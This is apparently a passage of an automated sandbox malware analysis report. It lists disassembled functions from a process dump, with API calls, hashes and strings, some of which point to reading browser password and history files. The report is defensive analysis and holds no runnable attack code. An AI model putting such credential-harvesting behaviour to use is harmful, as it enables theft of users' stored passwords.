                                                                                              • Opcode ID: 2f3d1febb6567f1c65e15d924abe411323abe179da33a997404dc77986320892
                                                                                              • Instruction ID: 098569c1990a85f87ddbd530571c52e66e2f7ba0f471894b996c1416d461d1fd
                                                                                              • Opcode Fuzzy Hash: 2f3d1febb6567f1c65e15d924abe411323abe179da33a997404dc77986320892
                                                                                              • Instruction Fuzzy Hash: 5001A932A01A2097C665BB27A50195EB354BE86B24316896FF844773C1CB3C6C61C6DF
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0041748F Relevance: 7.6, APIs: 5, Instructions: 53COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • AreFileApisANSI.KERNEL32 ref: 00417497
                                                                                              • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 004174B7
                                                                                              • malloc.MSVCRT ref: 004174BD
                                                                                              • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 004174DB
                                                                                              • ??3@YAXPAX@Z.MSVCRT ref: 004174E4
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: ByteCharMultiWide$??3@ApisFilemalloc
                                                                                              • String ID:
                                                                                              • API String ID: 2903831945-0
                                                                                              • Opcode ID: 26b6d0d827bb447631a2da2f7ad9fad7d37cc7249bf214c4621a9d0d58d44de2
                                                                                              • Instruction ID: 68224c9aa4b31b20fa5037399352f9c2f04b40a845063e8f60522cdb36b448b3
                                                                                              • Opcode Fuzzy Hash: 26b6d0d827bb447631a2da2f7ad9fad7d37cc7249bf214c4621a9d0d58d44de2
                                                                                              • Instruction Fuzzy Hash: DE01A4B150412DBEAF115FA99C80CAF7E7CEA463FC721422AF514E2290DA345E405AB9
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040D441 Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetParent.USER32(?), ref: 0040D453
                                                                                              • GetWindowRect.USER32(?,?), ref: 0040D460
                                                                                              • GetClientRect.USER32(00000000,?), ref: 0040D46B
                                                                                              • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0040D47B
                                                                                              • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 0040D497
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$Rect$ClientParentPoints
                                                                                              • String ID:
                                                                                              • API String ID: 4247780290-0
                                                                                              • Opcode ID: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                                                              • Instruction ID: 8744084584fea1eb3916f9079d499296a2dd08f7759f51c0708cf8f54c9212ed
                                                                                              • Opcode Fuzzy Hash: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                                                              • Instruction Fuzzy Hash: 62018836801129BBDB11EBA6CC49EFFBFBCFF06310F048069F901A2180D778A5018BA5
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00445093 Relevance: 7.5, APIs: 5, Instructions: 46COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                              • GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                                              • ??2@YAPAXI@Z.MSVCRT ref: 004450BE
                                                                                              • memset.MSVCRT ref: 004450CD
                                                                                                • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                              • ??3@YAXPAX@Z.MSVCRT ref: 004450F0
                                                                                                • Part of subcall function 00444E84: memchr.MSVCRT ref: 00444EBF
                                                                                                • Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F63
                                                                                                • Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F75
                                                                                                • Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F9D
                                                                                              • CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
                                                                                              • String ID:
                                                                                              • API String ID: 1471605966-0
                                                                                              • Opcode ID: 2aed10359402c50519c1c236b6adb34ede6eedef97d485569bed8d1556fc9971
                                                                                              • Instruction ID: af7e2442fb2a0afe256a59df9b01c6fa6c67666c78107f96d02934f32f814c95
                                                                                              • Opcode Fuzzy Hash: 2aed10359402c50519c1c236b6adb34ede6eedef97d485569bed8d1556fc9971
                                                                                              • Instruction Fuzzy Hash: D8F0C2765002107BE5207736AC8AEAB3A5CDF96771F11893FF416921D2EE698814C1BD
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0044474A Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 45COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • wcscpy.MSVCRT ref: 0044475F
                                                                                              • wcscat.MSVCRT ref: 0044476E
                                                                                              • wcscat.MSVCRT ref: 0044477F
                                                                                              • wcscat.MSVCRT ref: 0044478E
                                                                                                • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                                                                                                • Part of subcall function 00409A90: lstrcpyW.KERNEL32(?,?), ref: 00409AA5
                                                                                                • Part of subcall function 00409A90: lstrlenW.KERNEL32(?), ref: 00409AAC
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: wcscat$lstrcpylstrlenmemcpywcscpywcslen
                                                                                              • String ID: \StringFileInfo\
                                                                                              • API String ID: 102104167-2245444037
                                                                                              • Opcode ID: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                                                                                              • Instruction ID: e4f437c51a7ffcfb72b972a214432876dbdec8abc2c75880463b8380eb377783
                                                                                              • Opcode Fuzzy Hash: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                                                                                              • Instruction Fuzzy Hash: 41018FB290021DB6EF10EAA1DC45EDF73BCAB05304F0004B7B514F2052EE38DB969B69
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040E8E0 Relevance: 7.5, APIs: 5, Instructions: 41COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??3@
                                                                                              • String ID:
                                                                                              • API String ID: 613200358-0
                                                                                              • Opcode ID: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                                                              • Instruction ID: 8b058f36177a858601f18eb469b8e3bd7c1df3fc7b9e847ab044313c89d6339d
                                                                                              • Opcode Fuzzy Hash: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                                                              • Instruction Fuzzy Hash: 98F012B25047015FD760AF6AA8C491BF3E9AB597147668C3FF149D3641CB38FC508A1C
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040F508 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: memcpy$??3@
                                                                                              • String ID: g4@
                                                                                              • API String ID: 3314356048-2133833424
                                                                                              • Opcode ID: 37ff6d91120af751e53e18efb23c18060f8529393ff4323a563ff9c980eac345
                                                                                              • Instruction ID: 6372a4083673351870aa2a156e9431cadfa41d37230e9e7fabcd635cb7c3c96e
                                                                                              • Opcode Fuzzy Hash: 37ff6d91120af751e53e18efb23c18060f8529393ff4323a563ff9c980eac345
                                                                                              • Instruction Fuzzy Hash: D2217A30900604EFCB20DF29C94182ABBF5FF447247204A7EE852A3B91E735EE119B04
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040AAE3 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 44COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: _memicmpwcslen
                                                                                              • String ID: @@@@$History
                                                                                              • API String ID: 1872909662-685208920
                                                                                              • Opcode ID: 3ad5d2c3b3ee2b52e24687d5059668d8296d000cbab4a3a90200832106c23410
                                                                                              • Instruction ID: 0314511eba11a06c501d0b319d6753a7178557fc2485e08f734f24cb460fdfed
                                                                                              • Opcode Fuzzy Hash: 3ad5d2c3b3ee2b52e24687d5059668d8296d000cbab4a3a90200832106c23410
                                                                                              • Instruction Fuzzy Hash: F1F0CD3310471157D210DE199C41A2BF7F8DB813A5F11063FF991A31C2D739EC658657
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004100D7 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 004100FB
                                                                                              • memset.MSVCRT ref: 00410112
                                                                                                • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                                                • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                                                              • _snwprintf.MSVCRT ref: 00410141
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: memset$_snwprintf_wcslwrwcscpy
                                                                                              • String ID: </%s>
                                                                                              • API String ID: 3400436232-259020660
                                                                                              • Opcode ID: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                                                                                              • Instruction ID: d6b380c41b5e3e458bf6abeca455f552dea24a705517b0a2e3702c553642f250
                                                                                              • Opcode Fuzzy Hash: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                                                                                              • Instruction Fuzzy Hash: 9B01DBF3D0012977D730A755CC46FEA76ACEF45304F0000B6BB08B3186DB78DA458A99
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040D553 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 0040D58D
                                                                                              • SetWindowTextW.USER32(?,?), ref: 0040D5BD
                                                                                              • EnumChildWindows.USER32(?,Function_0000D4F5,00000000), ref: 0040D5CD
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: ChildEnumTextWindowWindowsmemset
                                                                                              • String ID: caption
                                                                                              • API String ID: 1523050162-4135340389
                                                                                              • Opcode ID: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                                                                                              • Instruction ID: dcfab03f3ae0740f4c11e1fd8af26e22289cdce227bdcda27870e2dbaf68b2c3
                                                                                              • Opcode Fuzzy Hash: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                                                                                              • Instruction Fuzzy Hash: 50F08131D0031876FB206B95CC4EB8A3268AB04744F000076BE04B61D2DBB8EA44C69D
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00401137 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00409BFD: memset.MSVCRT ref: 00409C07
                                                                                                • Part of subcall function 00409BFD: wcscpy.MSVCRT ref: 00409C47
                                                                                              • CreateFontIndirectW.GDI32(?), ref: 00401156
                                                                                              • SendDlgItemMessageW.USER32(?,000003EC,00000030,00000000,00000000), ref: 00401175
                                                                                              • SendDlgItemMessageW.USER32(?,000003EE,00000030,?,00000000), ref: 00401193
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
                                                                                              • String ID: MS Sans Serif
                                                                                              • API String ID: 210187428-168460110
                                                                                              • Opcode ID: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                                                                                              • Instruction ID: 44e142790c58e2983bb51e892a2c7280827b5342727586ee11fe1c2be2fb852b
                                                                                              • Opcode Fuzzy Hash: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                                                                                              • Instruction Fuzzy Hash: 7CF082B5A4030877EB326BA1DC46F9A77BDBB44B01F040935F721B91D1D3F4A585C658
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00409D7F Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 26COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: ClassName_wcsicmpmemset
                                                                                              • String ID: edit
                                                                                              • API String ID: 2747424523-2167791130
                                                                                              • Opcode ID: 966ba6659df31be0b994ff47204b898d343df69b3f9d85cbf29a1f53eef5b26a
                                                                                              • Instruction ID: aa36152fd255268de381ae2120198bffa1fffac517830ea88c39a2b7b5867ff0
                                                                                              • Opcode Fuzzy Hash: 966ba6659df31be0b994ff47204b898d343df69b3f9d85cbf29a1f53eef5b26a
                                                                                              • Instruction Fuzzy Hash: 86E0D872D8031E6AFB10EBA0DC4AFA977BCFB01708F0001B6B915E10C2EBB496494A45
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00414E13 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 21libraryloaderCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                              • GetProcAddress.KERNEL32(00000000,shlwapi.dll), ref: 00414E2B
                                                                                              • FreeLibrary.KERNEL32(00000000,?,00405751,00000000), ref: 00414E43
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                                              • String ID: SHAutoComplete$shlwapi.dll
                                                                                              • API String ID: 3150196962-1506664499
                                                                                              • Opcode ID: cdcb965da711456ca4b51fb43941328c5d6cb5423f9048b51d1f1fd4f659d43f
                                                                                              • Instruction ID: 56be8aed7d941f739c6f69dc747e21d8edf2639efa9d7e462eda1ee05908af23
                                                                                              • Opcode Fuzzy Hash: cdcb965da711456ca4b51fb43941328c5d6cb5423f9048b51d1f1fd4f659d43f
                                                                                              • Instruction Fuzzy Hash: C1D0C2353002315BD6616B27AC04AAF2A99EFC13A1B054035F928D2210DBA84996827D
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0041D893 Relevance: 6.3, APIs: 5, Instructions: 82COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: memcpy$memcmp
                                                                                              • String ID:
                                                                                              • API String ID: 3384217055-0
                                                                                              • Opcode ID: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                                                                              • Instruction ID: f5df6941464580ef2fdae31f27b7f31021858bb2d0e37ec30fcb1df3a02010a9
                                                                                              • Opcode Fuzzy Hash: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                                                                              • Instruction Fuzzy Hash: 8821B2B2E10249ABDB14EA91DC46EDF73FC9B44704F01442AF512D7181EB28E644C725
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00412A2A Relevance: 6.3, APIs: 5, Instructions: 50COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: memset$memcpy
                                                                                              • String ID:
                                                                                              • API String ID: 368790112-0
                                                                                              • Opcode ID: 97945d52b79a003f2428fc236831fd74eb0a020fff419a73dba27ff1a1f4f0ec
                                                                                              • Instruction ID: abb90bdd0bd5c960a46cc99acd1c91865272cbbdb433919b32c204757dd19146
                                                                                              • Opcode Fuzzy Hash: 97945d52b79a003f2428fc236831fd74eb0a020fff419a73dba27ff1a1f4f0ec
                                                                                              • Instruction Fuzzy Hash: 0201FCB5740B007BF235AB35CC03F9A73A8AF52724F004A1EF153966C2DBF8A554819D
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00410D9B Relevance: 6.2, APIs: 4, Instructions: 169windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 004019D8: GetMenu.USER32(?), ref: 004019F6
                                                                                                • Part of subcall function 004019D8: GetSubMenu.USER32(00000000), ref: 004019FD
                                                                                                • Part of subcall function 004019D8: EnableMenuItem.USER32(?,?,00000000), ref: 00401A15
                                                                                                • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000412,?,00000000), ref: 00401A36
                                                                                                • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000411,?,?), ref: 00401A5A
                                                                                              • GetMenu.USER32(?), ref: 00410F8D
                                                                                              • GetSubMenu.USER32(00000000), ref: 00410F9A
                                                                                              • GetSubMenu.USER32(00000000), ref: 00410F9D
                                                                                              • CheckMenuRadioItem.USER32(00000000,0000B284,0000B287,?,00000000), ref: 00410FA9
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: Menu$ItemMessageSend$CheckEnableRadio
                                                                                              • String ID:
                                                                                              • API String ID: 1889144086-0
                                                                                              • Opcode ID: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                                                                                              • Instruction ID: be5000c07a60ff25a23af51018491178d5f127676f18bd69b4cc56e9e4830f27
                                                                                              • Opcode Fuzzy Hash: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                                                                                              • Instruction Fuzzy Hash: D5517171B40704BFEB20AB66CD4AF9FBAB9EB44704F00046EB249B72E2C6756D50DB54
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00417FD5 Relevance: 6.1, APIs: 4, Instructions: 138fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CreateFileMappingW.KERNEL32(?,00000000,00000004,00000000,?,00000000), ref: 004180B8
                                                                                              • MapViewOfFile.KERNEL32(00000000,00000006,00000000,?,?), ref: 004180E3
                                                                                              • GetLastError.KERNEL32 ref: 0041810A
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00418120
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$CloseCreateErrorHandleLastMappingView
                                                                                              • String ID:
                                                                                              • API String ID: 1661045500-0
                                                                                              • Opcode ID: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
                                                                                              • Instruction ID: 5cb71d9443798353a032a6b226e7c46d85178154149a60e532078a3cdb21b7c8
                                                                                              • Opcode Fuzzy Hash: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
                                                                                              • Instruction Fuzzy Hash: 64518A71204706DFDB24CF25C984AA7BBE5FF88344F10492EF84287691EB74E895CB99
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0042EB92 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 133COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00415A91: memset.MSVCRT ref: 00415AAB
                                                                                              • memcpy.MSVCRT ref: 0042EC7A
                                                                                              Strings
                                                                                              • Cannot add a column to a view, xrefs: 0042EBE8
                                                                                              • sqlite_altertab_%s, xrefs: 0042EC4C
                                                                                              • virtual tables may not be altered, xrefs: 0042EBD2
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: memcpymemset
                                                                                              • String ID: Cannot add a column to a view$sqlite_altertab_%s$virtual tables may not be altered
                                                                                              • API String ID: 1297977491-2063813899
                                                                                              • Opcode ID: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                                                                                              • Instruction ID: f910cd7a27c7e389b2617bf4251edf561ae6288f62f29054cc1fb9bea0934792
                                                                                              • Opcode Fuzzy Hash: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                                                                                              • Instruction Fuzzy Hash: 1E418E75A00615EFCB04DF5AD881A99BBF0FF48314F65816BE808DB352D778E950CB88
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004055C5 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 122COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 0040560C
                                                                                                • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                                                                                                • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                                                • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                                                • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                                                • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4D2
                                                                                                • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                                                • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4F3
                                                                                                • Part of subcall function 0040A212: wcscpy.MSVCRT ref: 0040A269
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                                              • String ID: *.*$dat$wand.dat
                                                                                              • API String ID: 2618321458-1828844352
                                                                                              • Opcode ID: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                                                                                              • Instruction ID: e27ea46a2f82f1f177a07810d763c9ecc86b2647b265d762bc330c580f82b585
                                                                                              • Opcode Fuzzy Hash: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                                                                                              • Instruction Fuzzy Hash: BF419B71600205AFDB10AF65DC85EAEB7B9FF40314F10802BF909AB1D1EF7999958F89
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00410C46 Relevance: 6.1, APIs: 4, Instructions: 106COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT ref: 0040ECF9
                                                                                                • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT ref: 0040EDC0
                                                                                              • wcslen.MSVCRT ref: 00410C74
                                                                                              • _wtoi.MSVCRT ref: 00410C80
                                                                                              • _wcsicmp.MSVCRT ref: 00410CCE
                                                                                              • _wcsicmp.MSVCRT ref: 00410CDF
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcsicmp$??2@??3@_wtoiwcslen
                                                                                              • String ID:
                                                                                              • API String ID: 1549203181-0
                                                                                              • Opcode ID: a5a55a776a9d7000c7a90f9dc0003ee3df1153e447b70ecb3cda70254c63b6c3
                                                                                              • Instruction ID: d767fa7272777d82bc727b9b5621bf7cb5fcf48a3d465f11467ce1d5a1151d11
                                                                                              • Opcode Fuzzy Hash: a5a55a776a9d7000c7a90f9dc0003ee3df1153e447b70ecb3cda70254c63b6c3
                                                                                              • Instruction Fuzzy Hash: 5E4190359006089FCF21DFA9D480AD9BBB4EF48318F1105AAEC05DB316D6B4EAC08B99
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

